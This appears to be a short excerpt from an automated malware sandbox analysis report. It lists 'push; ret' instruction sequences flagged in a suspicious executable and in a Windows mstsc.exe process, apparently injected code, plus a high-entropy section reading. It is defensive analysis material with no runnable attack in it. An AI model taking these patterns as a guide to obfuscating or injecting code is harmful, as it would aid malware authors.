          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041B45C push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00415414 push esp; ret 4_2_00415416
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00414F46 push cs; ret 4_2_00414F47
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret 4_2_0041C1FF
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00415FC5 push ebp; ret 4_2_00415FC6
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C836 push es; retf 4_2_00A7C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C9C6 push es; ret 4_2_00A7CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; retf 0001h4_2_00A7C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; ret 4_2_00A7CB53
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7C976 push es; retn 0001h4_2_00A7CBA3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; iretd 4_2_00A7C833
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; retf 4_2_00A7C973
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B673 push es; retf 0001h4_2_00A7C9C3
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00A7B6C0 push es; iretd 4_2_00A7C833
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B0D0D1 push ecx; ret 21_2_04B0D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B2A2 push cs; ret 21_2_0070B2A3
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B3F2 push eax; ret 21_2_0070B3F8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_0070B3FB push eax; ret 21_2_0070B462
          Source: initial sampleStatic PE information: section name: .text entropy: 6.91186053545